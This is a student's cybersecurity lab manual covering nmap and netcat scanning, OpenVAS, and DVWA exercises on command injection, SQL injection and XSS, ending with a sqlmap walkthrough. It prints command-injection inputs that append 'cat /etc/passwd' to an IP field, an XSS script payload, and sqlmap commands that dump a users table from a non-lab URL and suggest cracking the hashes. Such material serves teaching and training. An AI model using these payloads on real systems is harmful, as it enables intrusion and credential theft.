CYBER SECURITY (2150002) Er.No.

: 161120105045

Practical- 2

AIM : TCP scanning using NMAP

Solution :

NMAP is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. However, nmap command comes with
lots of options that can make the utility more robust and difficult to follow for new
users.
The purpose of this post is to introduce a user to the nmap command line tool to
scan a host and/or network, so to find out the possible vulnerable points in the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.
nmap is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. However, nmap command comes with
lots of options that can make the utility more robust and difficult to follow for new
users.
The purpose of this post is to introduce a user to the nmap command line tool to
scan a host and/or network, so to find out the possible vulnerable points in the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.

Scan a single host or an IP address (IPv4)

### Scan a single ip address ###
nmap 192.168.1.1
## Scan a host name ###
nmap server1.cyberciti.biz
## Scan a host name with more info###
nmap -v server1.cyberciti.biz

Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3

## works with same subnet i.e. 192.168.1.0/24

nmap 192.168.1.1,2,3

You can scan a range of IP address too:

nmap 192.168.1.1-20

1|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

You can scan a range of IP address using a wildcard:

nmap 192.168.1.*
Finally, you scan an entire subnet:
nmap 192.168.1.0/24

Read list of hosts/networks from a file (IPv4)

nmap -iL /tmp/test.txt

cat> /tmp/test.txt

Sample outputs:
server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost

Excluding hosts/networks (IPv4)

nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254
Note: Students are required to perform all the options of NMAP and and has to
record the output.

2|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical- 2

AIM : Port scanning using NMAP

Nmap (“Network Mapper”) is a free and open source utility for network exploration
and security auditing. Many systems and network administrators also find it useful
for tasks such as network inventory, managing service upgrade schedules, and
monitoring host or service uptime.

Nmap uses raw IP packets in novel ways to determine what hosts are available on
the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts.
Nmap runs on all major computer operating systems, and both console and
graphical versions are available.

Solution :
map -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1
## Scan UDP port 53
nmap -p U:53 192.168.1.1
## Scan two ports ##
nmap -p 80,443 192.168.1.1
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1

outputs

3|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST

Interesting ports on 192.168.1.1:
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http
110/tcp closed pop3
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Note : Students requried to list the command and switches to check Firewall
weakness , detecting remote operating system and version

4|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical:3
Aim: TCP / UDP connectivity using Netcat
What is Netcat?

nc, also known as the TCP/IP swiss army knife is a feature rich network utility
which can be used to read and write data to network connections using TCP or
UDP.

What is portscanning?

PortScanning is the act of systematically scanning a computer's ports.

Open a new terminal (CTRL+ALT+T in Ubuntu) and run the following command
to perform a TCP port scan.

nc -v -z 127.0.0.1 25

5|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

To scan a range of ports with the following command.

nc -v -z host port-range

6|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical:4
Aim: Network Vulnerability using OpenVAS

In this exercise we will show a popular open source vulnerability scanner called
OpenVAS (Open Vulnerability Assessment System). OpenVAS is the evolution of
a previous project called Nessus, which became a proprietary tool. The actual
security scanner is accompanied with a daily updated feed of Network Vulnerability
Tests (NVTs), over 20,000 in total (as of January 2011).

Notes :

Commands preceded with \$" imply that you should execute the command as a
general user - not as root.

Commands preceded with \#" imply that you should be working as root.

Commands with more speci c command lines (e.g. \RTR-GW>" or \mysql>") imply
that you are executing commands on remote equipment, or within another program.

Installation

Install the server, client and plugin packages

$ sudo apt-get install openvas-server openvas-client openvas-plugins-base \

openvas-plugins-dfsg

Update the vulnerability database

$ sudo openvas-nvt-sync

Add a user to run the client

$ sudo openvas-adduser Login: sysadm

Authentication (pass/cert) [pass]: HIT ENTER Login password: USE

CLASS PASSWD

You will then be asked to add \User rules".

7|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Ideally, you will want to only allow scanning on hosts that are under your control.
To understand the syntax, check the openvas-adduser man page.

Let's allow this user to scan hosts in our lab network. Type
accept 10.10.0./16 default deny

type ctrl-D to exit, and then accept.

Operation

Starting the server

$ sudo service openvas-server start

The server has to load thousands of vulnerability checks, which takes VERY
LONG, especially on a machine that is not very powerful. Most likely, you will not
be able to run this on the virtual NSRC lab.

On a production setup, you will need a machine with multiple processors/ cores and
a quite a bit of RAM, especially if you will be scanning many hosts.

Running a scan

Create a text le with a list of hosts/networks to scan.

$ cd /home/sysadm $ vi scanme.txt

Add one host, network per line, like this:

10.10.0.250

10.10.2.5

Check the manual for the client to understand its parameters:

$ man openvas-client

Then, run the client like this:

$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \

openvas-output-.html -T txt -V -x

Alternatively, you can export into prettier HTML format with:

8|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \

openvas-output.txt -T html -V -x

You might have to transfer that le to your laptop so that you can open it with a
browser.

Keeping track of changes

You could take advantage of concurrent versioning systems like Subversion or Git
to keep track of changes in the hosts you scan.

Create a git repository

Add a cron job to scan hosts periodically (e.g. once a month) Use -T txt or -T xml
report format

Update the repository after each run

9|Page
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical-5
AIM: Web application testing using DVWA

What is Damn Vulnerable Web App (DVWA)?

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable.
 Its main goals are to be an aid for security professionals to test their skills and tools in a
legal environment, help web developers better understand the processes of securing web
applications and aid teachers/students to teach/learn web application security in a class
room environment.

What is Command Execution?

 Command Execution is where a website application provides the ability to execute

system commands.

What is a Command Injection Attack?

 The purpose of the command injection attack is to inject and execute commands specified
by the attacker in the vulnerable application.
 In situations like this, the application, which executes unwanted system commands, is
like a pseudo system shell, and the attacker may use it
as an authorized system user.
 Note, the commands are executed with the same privileges as the application and/or web
server.
 Command injection attacks are possible in most cases because of lack of correct input
data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers
etc.).

What is Command Injection Harvesting?

 Command Injection Harvesting is where a malicious user manipulates a website

command execution application to render sensitive data. (E.g., usernames, config files,
directory and file listings, etc).
o Unix/Linux Example: 9.9.9.9; cat /etc/passwd
o Windows Example: 9.9.9.9 && dir

Section 1: Configure Fedora14 Virtual Machine Settings

1 Open Your VMware Player

10 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

 Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player

2 Edit Fedora 14 Virtual Machine Settings

 Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings

3. Edit Network Adapter

o Instructions:

a . Highlight Network Adapter

b. Select Bridged

c. Click on the OK Button.

11 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Section 2: Login to Fedora14

1 Start Fedora14 VM Instance

 Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine

12 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

2. Login to Fedora14

 Instructions:
1. Login: student
2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

1 Start a Terminal Console

 Instructions:
1. Applications --> Terminal

13 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

2 Switch user to root

 Instructions:
1. su - root
2. <Whatever you set the root password to>

3 Get IP Address

 Instructions:
1. ifconfig -a
 Notes:
o As indicated below, my IP address is 192.168.1.106.
o Please record your IP address.

14 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Section 4: Start Up Damn Vulnerable Web App (DVWA)

1 Start up a Web Browser

 Instructions:
1. Applications --> Internet --> Firefox
 Notes:
o You can open up a Web browser on any Operating System on your network.
o Working with DVWA does not have to be done on your Fedora machine, the only
requirement to play with DVWA is a follow
1. The Fedora Server is on the Network.
2. httpd is running
3. mysqld is running

15 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

2 DVWA Database setup

 Instructions:
1. http://192.168.1.106/dvwa/login.php
 Replace 192.168.1.106 with the IP Address obtained from Section 3, Step
3.
2. Username: admin
3. Password: password
 "password" is the default password for user admin.

16 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

3 Set Website Security Level (Part 1)

 Instructions:
1. Click on DVWA Security

4 Set Website Security Level (Part 2)

 Instructions:
1. Select Low
2. Click Submit

17 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Section 5: Command Execution

1 Command Execution

 Instructions:
1. Click on Command Execution

2 Execute Ping

 Notes:
o
Below we are going to do a simply ping test using the web interface.
o
As an example, ping something on your network.
o
Use the IP Address obtained in Section 3, Step 3 if you have nothing else to ping.
 Instructions:
1. 192.168.1.106
2. Click Submit

18 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

3 cat /etc/password (Attempt 1)

 Instructions:
1. cat /etc/passwd
2. Click Submit
 Notes:
o Notice that either a messaging saying illegal IP address was displayed or nothing
was returned.

19 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

4 cat /etc/password (Attempt 2)

 Instructions:
1. 192.168.1.106; cat /etc/passwd
2. Click Submit
 Notes:
o Notice that we are now able to see the contents of the /etc/passwd file.

5 Looking at the weakness

 Instructions:
1. Bring up a terminal window (See Section 3, Step 1, if you don't know how)
2. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
 Notes:
1. Notice the two shell_exec lines.
2. These are the lines that execute ping depending on which Operating System is
being used.
3. In Unix/Linux command, you can run multiple command separated by a ";".
4. Notice the code does not check that if $target matches an IP Address
 \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of
multiple digits, like 192.168.1.106.
5. The code allows for an attacker to append commands behind the IP Address.
1. 192.168.1.106; cat /etc/passwd

20 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

6 Copy the /etc/passwd file to /tmp

 Instructions:
1. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
 Note:
o Here we are not only displaying the contents of /etc/passwd on the webpage, but
also we are copying the /etc/passwd file to the /tmp directory.

21 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Section 6: Proof of Lab

1 Proof of Lab

 Instructions:
1. Bring up a terminal windows
2. cd /tmp
3. ls -l passwd
4. date
5. echo "Your Name"
 Replace the string "Your Name" with your actual name.
 e.g., echo "John Gray"
 Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle

22 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical-6
AIM: SQL INJECTION USING DVWA
SQL injection is considered a high risk vulnerability due to the fact that can lead to full
compromise of the remote system. This is why in almost all web application penetration testing
engagements, the applications are always checked for SQL injection flaws.A general and simple
definition of when an application is vulnerable to SQL injection is when the application allows
you to interact with the database and to execute queries on the database then it is vulnerable to
SQL injection attacks.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment

SQL Injection

SQL injection (also known as SQL fishing) is a technique often used to attack data driven
applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the
website to pass a newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique that exploits a security
vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but can be used to
attack any type of SQL database.

PROCESS

Install XAMPP
Copy DVWA-1.0.8 INTO XAMPP/HTDOCS folder
Start XAMPP program
Start APACHE and MYSQL module by clicking on start.

23 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Start Firefox

Type http://127.0.0.1/DVWA-1.0.8/login.php

Login: admin

Password: password

Click on Login

24 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

2. SET SECURITY LEVEL a) Set DVWA Security Level

Click on DVWA Security, in the left hand menu. o Select "low"

Click Submit

25 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical-7
Aim: XSS using DVWA
What is Damn Vulnerable Web App (DVWA)?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.

Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment.

What is Cross Site Scripting?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web
applications.

XSS enables attackers to inject client-side script into Web pages viewed by other users.

A cross-site scripting vulnerability may be used by attackers to bypass access controls such as
the same origin policy.In Addition, the attacker can send input (e.g., username, password, session
ID, etc) which can be later captured by an external script.The victim's browser has no way to
know that the script should not be trusted, and will execute the script. Because it thinks the script
came from a trusted source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.

Step 1:

26 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Step 2 Set DVWA Security Level

Instructions: Click on DVWA Security, in the left hand menu.

Select "low" Click Submit

Step 3:

27 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Step 4: Basic XSS Test

Instructions: Name: Test 1

Message: <script>alert("This is a XSS Exploit Test")</script>
Click Sign Guestbook

Step 5: Result

28 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical-8
Aim : Automated SQL injection with SqlMap
sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.

Features

-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management
systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-
based, UNION query-based, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing
DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
-Automatic recognition of password hash formats and support for cracking them using a
dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's
choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or
specific columns across all databases' tables. This is useful, for instance, to identify tables

29 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

containing custom application credentials where relevant columns' names contain string like
name and pass.
-Support to download and upload any file from the database server underlying file system
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database
server underlying operating system when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.

Download

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the
terminal with the python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and most simple command to run with the sqlmap tool. It checks the input
parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different
kinds of sql injection payloads to the input parameter and checks the output. In the process
sqlmap is also able to identify the remote system os, database name and version. Here is how the
output might look like

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

30 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive. But its time to move on and see what
more is this tool capable of.

Discover Databases
Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next
step is to find out the names of the databases that exist on the remote system. The "--dbs" option
is used to get the database list.

$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
The output shows the existing databases on the remote system.

31 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of
interest over here is 'safecosmetics'

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

[11:55:18] [INFO] fetching tables for database: 'safecosmetics'

[11:55:19] [INFO] heuristics detected web page charset 'ascii'

[11:55:19] [INFO] the SQL query used returns 216 entries

[11:55:20] [INFO] retrieved: acl_acl

[11:55:21] [INFO] retrieved: acl_acl_sections

........... more tables

isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some
important table. Lets say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T

users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'

32 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

[12:17:41] [INFO] the SQL query used returns 8 entries

[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash

[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+

So now the columns are clearly visible.

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would
be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T

users

The above command will simply dump the data of the particular table, very much like the
mysqldump command.
The output might look similar to this

33 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

| id | hash | name | email | password | permission | system_home |

system_allow_only |

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank>

|

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would
get the login details rightaway. sqlmap will create a csv file containing the dump data for easy
analysis.

So far we have been able to collect a lot of information from the remote database using sqlmap.
Its almost like having direct access to remote database through a client like phpmyadmin. In real
scenarios hackers would try to gain a higher level to access to the system. For this, they would
try to crack the password hashes and try to login through the admin panel. Or they would try to
get an os shell using sqlmap.

34 | P a g e